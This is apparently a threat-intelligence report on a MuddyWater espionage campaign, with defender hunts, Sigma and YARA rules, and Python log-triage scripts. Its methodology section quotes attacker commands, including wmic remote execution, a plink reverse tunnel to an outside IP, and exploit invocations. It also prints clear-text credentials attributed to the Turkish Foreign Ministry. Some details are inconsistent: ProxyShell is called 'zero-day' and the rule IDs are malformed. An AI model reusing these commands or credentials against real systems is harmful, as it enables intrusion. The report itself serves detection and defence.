
Executive Summary

This analysis covers a sophisticated cyber espionage campaign conducted by the MuddyWater threat actor (also known as TEMP.Zagros, Mango Sandstorm, TA450) targeting government entities, critical infrastructure, and private sector organizations across the Middle East and globally.

Campaign Scope:
  • 140+ confirmed targets across 8+ countries
  • 4 distinct attack phases documented in Episodes 1-4
  • Primary vectors: ProxyShell exploitation (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)
  • Persistence mechanism: BellaCiao custom backdoor
  • Attribution confidence: High (based on TTPs, tooling, and target selection)

Key Findings

1. Target Profile and Victim Selection

Primary Targets:
  • Government foreign ministries and diplomatic missions
  • Law enforcement and intelligence agencies
  • Critical infrastructure operators
  • Telecommunications providers
  • Healthcare facilities
  • Financial institutions
Geographic Focus:
  • Middle East (Primary): UAE, Saudi Arabia, Kuwait, Turkey, Jordan, Iran
  • Central Asia: Afghanistan, Pakistan
  • Caucasus: Georgia, Armenia, Azerbaijan
  • Europe (Secondary): Israel, Germany, France, Austria, UK
  • Global (Tertiary): India, South Korea, Australia
Target Selection Criteria:
  • Government entities with foreign policy responsibilities
  • Organizations with access to sensitive intelligence
  • Critical infrastructure with national security implications
  • Regional adversaries and geopolitical competitors

2. Attack Methodology

Phase 1: Reconnaissance

Tools and Techniques:
  • Subdomain enumeration: subfinder, amass, dnsenum
  • Network scanning: nmap, nbtscan
  • Service detection: whatweb, wpscan
  • OSINT collection: whois, DNS enumeration
Reconnaissance Pattern:
# Subdomain enumeration
subfinder -d [target-domain] -o targets.txt

# Active scanning of discovered hosts
nmap -vvv -Pn --open -p445,22,21,1433,3306,3389,139,80,443,8080 [target-range]

# Service version detection
nmap -sV -sC [target-ip]
Observations:
  • Systematic enumeration of entire government domains
  • Focus on Microsoft Exchange (ports 443, 25, 587)
  • SMB/RDP service discovery (ports 445, 139, 3389)
  • Database service enumeration (ports 1433, 3306)

Phase 2: Initial Access

Primary Attack Vector: ProxyShell
Vulnerabilities Chained:
  1. CVE-2021-34473: Pre-auth path confusion vulnerability
  2. CVE-2021-34523: Elevation of privilege on Exchange PowerShell backend
  3. CVE-2021-31207: Post-auth arbitrary file write vulnerability
Exploitation Process:
# Automated ProxyShell exploitation
python3 proxyshell.py -t [target-domain]
python3 exchange_proxyshell.py -u [target-ip] -e [email@domain]
Success Indicators:
  • Webshell upload to /owa/auth/ or /aspnet_client/
  • HTTP 200 response from webshell path
  • Ability to execute arbitrary commands
Secondary Attack Vectors:
  • SQL injection against web applications
  • SMB relay attacks (attempted via enum4linux, smbclient)
  • RDP brute forcing (using ncrack, crowbar, medusa)
  • FTP service exploitation

Phase 3: Persistence and Lateral Movement

BellaCiao Backdoor Deployment
Configuration Profile:
Service Name: "Java Update Services" / "Microsoft Exchange Services Log"
Executable Path: C:\ProgramData\Microsoft\Diagnostic\Java Update Services.exe
Webserver Script: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.ps1
Plink Tunnel: C:\ProgramData\Microsoft\Diagnostic\JavaUpdateServices.exe
Port: 8000 (local web interface)
Alive Time: 24 hours
C2 Domains: twittsupport.com, msn-center.uk
Backup Credentials: Israel / Israel@123!
Persistence Mechanism:
  • Windows service installation with legitimate-sounding name
  • Hidden attribute on executables
  • PowerShell-based webserver for remote management
  • Plink for SSH tunneling (RDP forwarding)
Lateral Movement Techniques:
WMI-based Remote Execution:
wmic /NODE:"[target-ip]" /USER:"[domain\user]" /PASSWORD:"[password]" Process Call Create "cmd.exe /c [command]"
Network Share Access:
net use \\[target-ip]\C$ "[password]" /user:[domain\user]
dir \\[target-ip]\C$\users
type \\[target-ip]\C$\windows\temp\log.txt
Examples from Turkish Foreign Ministry:
# Credential harvesting
wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\\windows\\temp\\Crashpad\\log.txt"

# RDP tunneling setup
wmic /NODE:"10.20.105.11" /USER:"Admin1@MFA" /PASSWORD:"KazimAtes1977+-*/!!KazimAtes1977+-*/!!" Process Call Create "cmd.exe /c echo Y | c:\\programdata\\microsoft\\diagnostic\\vmware-tools.exe 103.57.251.153 -P 443 -C -R 0.0.0.0:40455:127.0.0.1:3389 -l ruby -pw ruby@123!"
SSH Tunneling for Anonymity:
ssh -N -L 192.168.10.107:8080:127.0.0.2:8080 -p 443 [email protected]

Phase 4: Collection and Exfiltration

Credential Harvesting:
  • SAM database dumping: samdump2 SAM SYSTEM
  • LSASS memory dumping via comsvcs.dll
  • Network share password reuse
  • Active Directory credential extraction
Data Collection:
  • Log file exfiltration from compromised hosts
  • Network topology mapping
  • Email metadata collection (legacyDN enumeration)
  • File server enumeration

3. Infrastructure Analysis

Compromised Infrastructure:
  • ameen-alkhalij.nu - WordPress server (likely victim turned C2)
  • 88.80.145.122 - SSH tunnel/proxy endpoint
  • 103.57.251.31:3512 - SOCKS5 proxy
Command and Control:
  • twittsupport.com - BellaCiao primary C2
  • msn-center.uk - BellaCiao backup C2
Operational Security:
  • Use of Cloudflare for reconnaissance traffic
  • SSH tunneling through compromised infrastructure
  • SOCKS proxies for pivoting
  • Multiple backup C2 domains
  • Legitimate-looking service names for persistence

4. Toolset Analysis

Open Source Tools:
  • Reconnaissance: subfinder, amass, nmap, dnsenum, nbtscan
  • Web Scanning: ffuf, wpscan, whatweb
  • Exploitation: metasploit, sqlmap, various ProxyShell exploits
  • Post-Exploitation: enum4linux, smbclient, wmic, rpcclient
  • Credential Attacks: medusa, ncrack, crowbar
  • Tunneling: SSH, plink
Custom Tools:
  • BellaCiao: Custom backdoor with service persistence
  • ProxyShell Exploits: Multiple Python-based exploit scripts
  • Webshells: Custom ASPX webshells with randomized names
Development Environment:
  • Operating System: Linux (Kali/Parrot OS)
  • Primary Shell: zsh
  • Languages: Python, PowerShell, Go (for BellaCiao)
  • Version Control: Git for tool management

Attack Timeline

Early 2022: Initial Campaign

Q1-Q2 2022: ProxyShell Mass Exploitation
  • Mass scanning of Middle Eastern IP ranges
  • Automated ProxyShell exploitation against Exchange servers
  • Initial webshell deployment across 100+ organizations
  • Focus on government email servers
Documented Targets:
  • Turkey: 41 organizations compromised
  • Saudi Arabia: 29 organizations compromised
  • Kuwait: 21 organizations compromised
  • Iran: 18 organizations compromised

Late 2022: Persistence Establishment

Q3-Q4 2022: BellaCiao Deployment
  • October 26, 2022: Ransomware testing (Episode 4 logs)
  • Service-based persistence mechanisms deployed
  • C2 infrastructure established (twittsupport.com, msn-center.uk)
  • SSH tunneling infrastructure created
Key Compromises:
  • Turkish Foreign Ministry (212.175.168.58)
  • Dubai Police infrastructure (BellaCiao configuration found)
  • Multiple Exchange servers maintained for lateral movement

2023-2024: Sustained Operations

Continuous Activity:
  • Ongoing reconnaissance of government domains
  • Credential harvesting and reuse
  • Lateral movement within compromised networks
  • Establishment of multiple access vectors per organization
Expansion:
  • Additional countries targeted (Pakistan, Georgia, Armenia)
  • Critical infrastructure focus (telecommunications, utilities)
  • Healthcare sector targeting

January 2025: Current Operations

Recent Activity (Jan 8-9, 2025):
  • WordPress exploitation attempts on ameen-alkhalij.nu
  • 100+ XML-RPC brute force attempts in 4-minute window
  • Continuous setup-config.php scanning from Cloudflare IPs
  • Evidence of active C2 infrastructure

Impact Assessment

Confirmed Compromises

Critical Impact (Government):
  • Turkish Foreign Ministry: Full network compromise, credential harvesting, lateral movement documented
  • Dubai Police: BellaCiao backdoor configured specifically for this target
  • Afghan Government: Multiple ministries (MOF, MOD, MOI, MFA, AOP) under active reconnaissance
  • UAE Government: Emaratech, RTA, Dubai Chamber, DNRD under attack
High Impact (Critical Infrastructure):
  • Telecommunications: Turkish Telecom, Jazz Pakistan, Roshan Afghanistan
  • Healthcare: Multiple Saudi hospitals, Kuwaiti medical facilities
  • Financial: Insurance and investment firms in Saudi Arabia, Kuwait
Medium Impact (Private Sector):
  • Manufacturing and industrial companies
  • IT service providers
  • Media organizations

Data at Risk

Sensitive Information:
  • Diplomatic communications (Foreign Ministry compromise)
  • Intelligence and law enforcement data (Police infrastructure)
  • PII of government employees and citizens
  • Financial records and transactions
  • Healthcare patient data
  • Critical infrastructure operational data
Estimated Scale:
  • 140+ organizations with confirmed exploitation attempts
  • 30+ confirmed shells deployed successfully
  • 1,369+ reconnaissance commands executed
  • 49 failed attempts documented (indicates detection)

Geopolitical Context

Attribution Assessment: Based on target selection, TTPs, and operational patterns, this activity is attributed with high confidence to MuddyWater (aka TEMP.Zagros, Mango Sandstorm, TA450), an Iranian state-sponsored APT group.

Supporting Evidence:
  • Focus on Middle Eastern governments and adversaries
  • BellaCiao backdoor (known MuddyWater tool)
  • ProxyShell exploitation timeline matches known campaigns
  • Target selection aligns with Iranian strategic interests
  • Use of Persian language in some file paths and commands
Likely Objectives:
  • Intelligence collection on regional adversaries
  • Monitoring of diplomatic activities
  • Pre-positioning for future operations
  • Intellectual property theft
  • Critical infrastructure mapping

Recommendations for Defenders

Immediate Actions (0-24 hours)

1. Hunt for BellaCiao Indicators

Service Detection:
# Check for suspicious services
Get-Service | Where-Object {$_.Name -like "*Java Update*" -or $_.Name -like "*Microsoft Exchange Services*"}

# Check service executable paths
Get-WmiObject win32_service | Where-Object {$_.PathName -like "*ProgramData\Microsoft\Diagnostic*"}
File System:
# Check for BellaCiao components
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic" -Force
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic\*.exe" -Force
Get-ChildItem "C:\ProgramData\Microsoft\Diagnostic\*.ps1" -Force
Network Connections:
# Check for connections to C2 domains
Get-NetTCPConnection | Where-Object {$_.State -eq "Established"} | Where-Object {$_.RemotePort -eq 443 -or $_.RemotePort -eq 8000}

2. Webshell Detection

Exchange Server Paths:
# Scan OWA directories for webshells
Get-ChildItem -Path "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth" -Filter "*.aspx" -Recurse

# Scan aspnet_client directories
Get-ChildItem -Path "C:\inetpub\wwwroot\aspnet_client" -Filter "*.aspx" -Recurse
Common Webshell Names:
  • webclient.aspx, OutlookOU.aspx, errorFE.aspx
  • Random 5-10 character names ending in .aspx
  • Files modified after ProxyShell patches were released

3. Network Isolation

Block C2 Domains:
twittsupport.com
msn-center.uk
ameen-alkhalij.nu
Block Suspicious IPs:
88.80.145.122 (SSH tunnel endpoint)
103.57.251.31 (SOCKS proxy)

Short-Term Actions (1-7 days)

4. ProxyShell Vulnerability Assessment

Check Exchange Version:
Get-Command Exsetup.exe | ForEach {$_.FileVersionInfo}
Verify Patching Status:
  • CVE-2021-34473 (May 2021 or later)
  • CVE-2021-34523 (May 2021 or later)
  • CVE-2021-31207 (May 2021 or later)
Apply Patches Immediately:
  • Exchange Server 2019 CU10 or later
  • Exchange Server 2016 CU21 or later
  • Exchange Server 2013 CU23 or later

5. Credential Reset

High-Priority Accounts:
  • Administrator and domain admin accounts
  • Exchange admin accounts
  • Service accounts with network access
  • VPN and remote access accounts
Turkish Foreign Ministry Compromised Credentials:
Admin1@MFA / KazimAtes1977+-*/!!KazimAtes1977+-*/!!
pfsenselondra@MFA / 1234qqqQQQ
If similar credential patterns exist, reset immediately

6. Log Analysis

Review Exchange Logs:
# Check IIS logs for ProxyShell indicators
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "autodiscover/autodiscover.json"
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "X-Rps-CAT"
Select-String -Path "C:\inetpub\logs\LogFiles\W3SVC1\*.log" -Pattern "X-BEResource"
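As an added example (not part of the original report), the following Python triage applies the IIS-log indicators above together with the webshell-path checks from section 2 to an exported W3C log, so the same logic can be run off-host over logs shipped from an Exchange front end. The log lines are constructed; example.net and the X-Rps-CAT token value are placeholders.

```python
import sys
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "line_no category client uri status")

# Constructed sample of an Exchange front-end IIS log in W3C format (not real data).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2025-01-08 10:14:03 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa%2f 443 10.0.0.77 Mozilla/5.0 200
2025-01-08 10:15:21 10.0.0.5 POST /autodiscover/autodiscover.json @example.net/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@example.net 443 203.0.113.9 python-requests/2.28 200
2025-01-08 10:15:24 10.0.0.5 POST /autodiscover/autodiscover.json @example.net/powershell/?X-Rps-CAT=CONSTRUCTEDTOKEN&Email=autodiscover/autodiscover.json%3F@example.net 443 203.0.113.9 python-requests/2.28 200
2025-01-08 10:16:02 10.0.0.5 GET /aspnet_client/xk9q2r.aspx cmd=whoami 443 203.0.113.9 Mozilla/5.0 200
2025-01-08 10:16:40 10.0.0.5 GET /owa/auth/logout.aspx - 443 10.0.0.77 Mozilla/5.0 200
2025-01-08 10:17:11 10.0.0.5 GET /owa/auth/errorFE.aspx - 443 198.51.100.4 curl/8.0 404
"""

# Indicators from the report: backend-impersonation tokens and the re-embedded
# autodiscover.json reference that mark ProxyShell path confusion.
PROXYSHELL_MARKERS = ("autodiscover/autodiscover.json", "x-rps-cat", "x-beresource")
WEBSHELL_DIRS = ("/owa/auth/", "/aspnet_client/")
KNOWN_OWA_PAGES = ("/owa/auth/logon.aspx", "/owa/auth/logout.aspx")


def parse_w3c(text):
    """Yield (line_no, record) for each data row, keyed by the #Fields: header."""
    fields = None
    for n, line in enumerate(text.splitlines(), 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ")
        if fields is None or len(parts) != len(fields):
            continue  # header missing or malformed row: skip rather than guess columns
        yield n, dict(zip(fields, parts))


def triage(text):
    """Return findings for ProxyShell requests and successful non-OWA .aspx hits."""
    findings = []
    for n, rec in parse_w3c(text):
        stem = rec.get("cs-uri-stem", "").lower()
        query = rec.get("cs-uri-query", "").lower()
        uri = stem if query in ("", "-") else stem + "?" + query
        status = rec.get("sc-status", "")
        client = rec.get("c-ip", "")
        if "/autodiscover/autodiscover.json" in stem and any(m in query for m in PROXYSHELL_MARKERS):
            findings.append(Finding(n, "proxyshell", client, uri, status))
        elif (status == "200" and stem.endswith(".aspx")
              and any(d in stem for d in WEBSHELL_DIRS) and stem not in KNOWN_OWA_PAGES):
            findings.append(Finding(n, "webshell", client, uri, status))
    return findings


def clients_by_hits(findings):
    """Source IPs ranked by number of suspicious requests, for scoping and blocking."""
    return Counter(f.client for f in findings).most_common()


if __name__ == "__main__":
    text = SAMPLE_LOG
    if len(sys.argv) > 1:  # pass a path to an exported u_ex*.log to analyse real data
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    for f in triage(text):
        print(f"line {f.line_no}: {f.category:10} {f.client:15} {f.status} {f.uri}")
    print("clients:", clients_by_hits(triage(text)))
```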
Review Windows Event Logs:
# Check for suspicious service installations
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7045} | Where-Object {$_.Message -like "*Java Update*" -or $_.Message -like "*Diagnostic*"}

# Check for WMI execution
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-WMI-Activity/Operational'; ID=5857,5860,5861}
Network Traffic Analysis:
  • Review firewall logs for connections to C2 domains
  • Analyze DNS logs for subdomain enumeration patterns
  • Check proxy logs for reconnaissance activity

7. Endpoint Detection

Deploy EDR/AV Signatures
YARA Rule for BellaCiao:
rule BellaCiao_Backdoor {
    meta:
        description = "Detects BellaCiao backdoor components"
        threat_level = 10
        in_the_wild = true
    strings:
        $s1 = "Java Update Services" wide ascii
        $s2 = "Microsoft Exchange Services Log" wide ascii
        $s3 = "twittsupport.com" wide ascii
        $s4 = "msn-center.uk" wide ascii
        $path1 = "C:\\ProgramData\\Microsoft\\Diagnostic\\" wide ascii
        $cmd1 = "Israel@123!" wide ascii
    condition:
        any of ($s*) or all of ($path*) or $cmd1
}

Medium-Term Actions (1-4 weeks)

8. Architecture Review

Network Segmentation:
  • Isolate Exchange servers from internal network
  • Implement jump hosts for administrative access
  • Segment critical systems by function and sensitivity
Access Controls:
  • Implement MFA for all administrative accounts
  • Restrict WMI and PowerShell remoting
  • Disable SMBv1 and legacy protocols
  • Apply least privilege principles
Monitoring:
  • Deploy network traffic analysis tools
  • Implement file integrity monitoring on Exchange servers
  • Enable PowerShell script block logging
  • Configure Sysmon for advanced logging

9. Threat Hunting

Hunt for Lateral Movement:
// Azure Sentinel / Microsoft 365 Defender KQL
DeviceProcessEvents
| where ProcessCommandLine contains "wmic" and ProcessCommandLine contains "/NODE:"
| where ProcessCommandLine contains "/USER:" and ProcessCommandLine contains "/PASSWORD:"

DeviceNetworkEvents
| where RemoteIP in ("88.80.145.122", "103.57.251.31")
| where RemotePort in (443, 8000, 9090, 40455)

DeviceFileEvents
| where FolderPath startswith "C:\\ProgramData\\Microsoft\\Diagnostic"
| where FileName endswith ".exe" or FileName endswith ".ps1"
Hunt for Reconnaissance:
DnsEvents
| where Name contains "twittsupport.com" or Name contains "msn-center.uk"

DeviceNetworkEvents
| where RemotePort in (445, 139, 3389, 1433, 3306)
| summarize ConnectionCount=count() by RemoteIP, RemotePort
| where ConnectionCount > 100
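The same /NODE: + /USER: + /PASSWORD: hunt as runnable triage over exported process-creation records, with the clear-text password redacted before the alert is written and the reached nodes collected for containment scoping. This is an added example, not tooling from the report; the event records are constructed (node addresses and the account name follow the report's wmic examples, the hostnames and password are made up).

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (shape of Sysmon Event 1 / Security 4688 exports).
SAMPLE_EVENTS = [
    {"host": "MFA-WS01", "user": "MFA\\admin1", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic /NODE:"10.20.101.17" /USER:"Admin1@MFA" /PASSWORD:"Sample+-*/!!Pw" '
                'Process Call Create "cmd.exe /c netstat -ano -p tcp >c:\\windows\\temp\\log.txt"'},
    {"host": "MFA-WS02", "user": "MFA\\helpdesk", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": "wmic os get caption"},  # benign local use, must not alert
    {"host": "MFA-WS01", "user": "MFA\\admin1", "image": r"C:\Windows\System32\wbem\wmic.exe",
     "cmdline": 'wmic /node:fileserver01 /user:"MFA\\svc_backup" /password:Sample2 '
                'process call create "cmd.exe /c whoami"'},
]

NODE_RE = re.compile(r'/NODE:"?([^"\s]+)"?', re.I)
USER_RE = re.compile(r'/USER:"?([^"\s]+)"?', re.I)
PASS_RE = re.compile(r'/PASSWORD:(?:"[^"]*"|\S+)', re.I)  # quoted or bare value
CREATE_RE = re.compile(r'Process\s+Call\s+Create\s+"(.*)"\s*$', re.I | re.S)


@dataclass
class WmiAlert:
    source_host: str
    target_node: str
    user: str
    remote_command: str
    redacted_cmdline: str


def is_remote_wmic_with_creds(cmdline):
    """Same predicate as the KQL/Sigma logic: remote node plus embedded credentials."""
    c = cmdline.lower()
    return all(t in c for t in ("/node:", "/user:", "/password:", "process call create"))


def redact_password(cmdline):
    """Strip the clear-text password so the alert can be stored and shared."""
    return PASS_RE.sub('/PASSWORD:"<redacted>"', cmdline)


def triage_events(events):
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\wmic.exe"):
            continue
        cmd = ev["cmdline"]
        if not is_remote_wmic_with_creds(cmd):
            continue
        node, user, created = NODE_RE.search(cmd), USER_RE.search(cmd), CREATE_RE.search(cmd)
        alerts.append(WmiAlert(
            source_host=ev["host"],
            target_node=node.group(1) if node else "?",
            user=user.group(1) if user else "?",
            remote_command=created.group(1) if created else "?",
            redacted_cmdline=redact_password(cmd),
        ))
    return alerts


def impacted_nodes(alerts):
    """Hosts reached over WMI, i.e. the containment scope beyond the source host."""
    return sorted({a.target_node for a in alerts})


if __name__ == "__main__":
    for a in triage_events(SAMPLE_EVENTS):
        print(f"{a.source_host} -> {a.target_node} as {a.user}: {a.remote_command}")
    print("scope:", impacted_nodes(triage_events(SAMPLE_EVENTS)))
```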

10. Incident Response Plan

If Compromise Confirmed:
  1. Containment:
    • Isolate affected systems from network
    • Block C2 domains at firewall/DNS
    • Disable compromised accounts
    • Change all administrative passwords
  2. Eradication:
    • Remove webshells from Exchange servers
    • Delete BellaCiao service and files
    • Rebuild compromised systems from known-good images
    • Apply all security patches
  3. Recovery:
    • Restore from clean backups if available
    • Verify system integrity before reconnecting to network
    • Monitor closely for signs of re-compromise
  4. Lessons Learned:
    • Document timeline of compromise
    • Identify gaps in detection and prevention
    • Update incident response procedures
    • Conduct tabletop exercises

Long-Term Actions (1-3 months)

11. Security Program Enhancements

Vulnerability Management:
  • Establish patch management SLAs (critical patches within 7 days)
  • Implement vulnerability scanning on regular schedule
  • Prioritize internet-facing systems for patching
  • Subscribe to vendor security advisories
Security Monitoring:
  • Deploy SIEM with correlation rules for APT activity
  • Implement network traffic analysis (NTA)
  • Enable cloud-based threat intelligence feeds
  • Establish SOC with 24/7 monitoring capability
Access Management:
  • Implement privileged access management (PAM) solution
  • Deploy jump hosts for all administrative access
  • Enforce MFA for all remote access
  • Review and reduce administrative privileges
Backup and Recovery:
  • Implement offline/air-gapped backups
  • Test backup restoration regularly
  • Ensure backups cover all critical systems
  • Document and practice recovery procedures

12. Threat Intelligence Integration

Subscribe to Feeds:
  • Government CERT advisories (local country)
  • Commercial threat intelligence platforms
  • Information sharing communities (ISACs)
  • Open source intelligence (OSINT) sources
IOC Integration:
  • Automate IOC ingestion into SIEM/EDR
  • Correlate IOCs with internal telemetry
  • Share IOCs with trusted partners
  • Participate in threat intelligence sharing

13. Security Awareness Training

Topics to Cover:
  • Phishing and social engineering awareness
  • Secure password practices
  • Recognizing suspicious activity
  • Incident reporting procedures
  • Insider threat indicators
Target Audiences:
  • Executive leadership (strategic briefing)
  • IT administrators (technical deep dive)
  • All employees (general awareness)
  • Security team (threat hunting techniques)

Detection Rules

Sigma Rules

BellaCiao Service Detection

title: BellaCiao Backdoor Service
id: a8b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects BellaCiao backdoor service installation
references:
    - Internal MuddyWater intelligence
author: Security Team
date: 2025/01/09
logsource:
    product: windows
    service: system
detection:
    selection:
        EventID: 7045
        ServiceName|contains:
            - 'Java Update Services'
            - 'Microsoft Exchange Services Log'
    selection_path:
        EventID: 7045
        ImagePath|contains: 'ProgramData\Microsoft\Diagnostic'
    condition: selection or selection_path
falsepositives:
    - Legitimate Java update services (check path)
level: critical
tags:
    - attack.persistence
    - attack.t1543.003

WMI Lateral Movement

title: WMI Lateral Movement with Credentials
id: b9c4d5e6-f7g8-9012-hijk-lm3456789012
status: experimental
description: Detects WMI lateral movement with embedded credentials
references:
    - Turkish Foreign Ministry compromise
author: Security Team
date: 2025/01/09
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\wmic.exe'
        CommandLine|contains|all:
            - '/NODE:'
            - '/USER:'
            - '/PASSWORD:'
            - 'Process Call Create'
    condition: selection
falsepositives:
    - Legitimate system administration (rare with embedded passwords)
level: high
tags:
    - attack.lateral_movement
    - attack.t1047

ProxyShell Webshell Access

title: ProxyShell Webshell Access
id: c1d2e3f4-g5h6-7890-ijkl-mn4567890123
status: experimental
description: Detects access to webshells in Exchange directories
references:
    - CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
author: Security Team
date: 2025/01/09
logsource:
    category: webserver
detection:
    selection:
        cs-uri-stem|contains:
            - '/owa/auth/'
            - '/aspnet_client/'
        cs-uri-stem|endswith: '.aspx'
        sc-status: 200
    filter:
        cs-uri-stem|contains:
            - '/owa/auth/logon.aspx'
            - '/owa/auth/logout.aspx'
    condition: selection and not filter
falsepositives:
    - Legitimate OWA files (filter common ones)
level: critical
tags:
    - attack.persistence
    - attack.t1505.003

YARA Rules

ProxyShell Webshell

rule ProxyShell_Webshell {
    meta:
        description = "Detects ASPX webshells from ProxyShell exploitation"
        threat_level = 10
        in_the_wild = true
        reference = "MuddyWater ProxyShell campaign"
    strings:
        $aspx1 = "<%@ Page Language=" ascii wide
        $aspx2 = "Request[" ascii wide
        $cmd1 = "cmd.exe" ascii wide
        $cmd2 = "powershell" ascii wide nocase
        $cmd3 = "wmic" ascii wide
        $exec1 = "Process.Start" ascii wide
        $exec2 = "ProcessStartInfo" ascii wide
        $exec3 = "System.Diagnostics" ascii wide
    condition:
        filesize < 100KB and
        any of ($aspx*) and
        any of ($cmd*) and
        any of ($exec*)
}

Conclusion

The MuddyWater campaign represents a significant and ongoing threat to government entities and critical infrastructure across the Middle East. The threat actor demonstrates:
  • Sophistication: Use of zero-day exploits (ProxyShell), custom malware (BellaCiao), and advanced operational security
  • Persistence: Sustained operations over 3+ years with evolving tactics
  • Scale: 140+ targeted organizations across 8+ countries
  • Impact: Confirmed compromise of foreign ministry, law enforcement, and critical infrastructure
Defenders must prioritize:
  1. Immediate patching of ProxyShell vulnerabilities
  2. Hunt for BellaCiao backdoor indicators
  3. Enhanced monitoring of Exchange servers and lateral movement
  4. Credential hygiene and privilege reduction
  5. Network segmentation and access controls
This is an active threat requiring sustained defensive efforts. Organizations in the Middle East, particularly government entities, should assume they are targets and implement defense-in-depth strategies immediately.
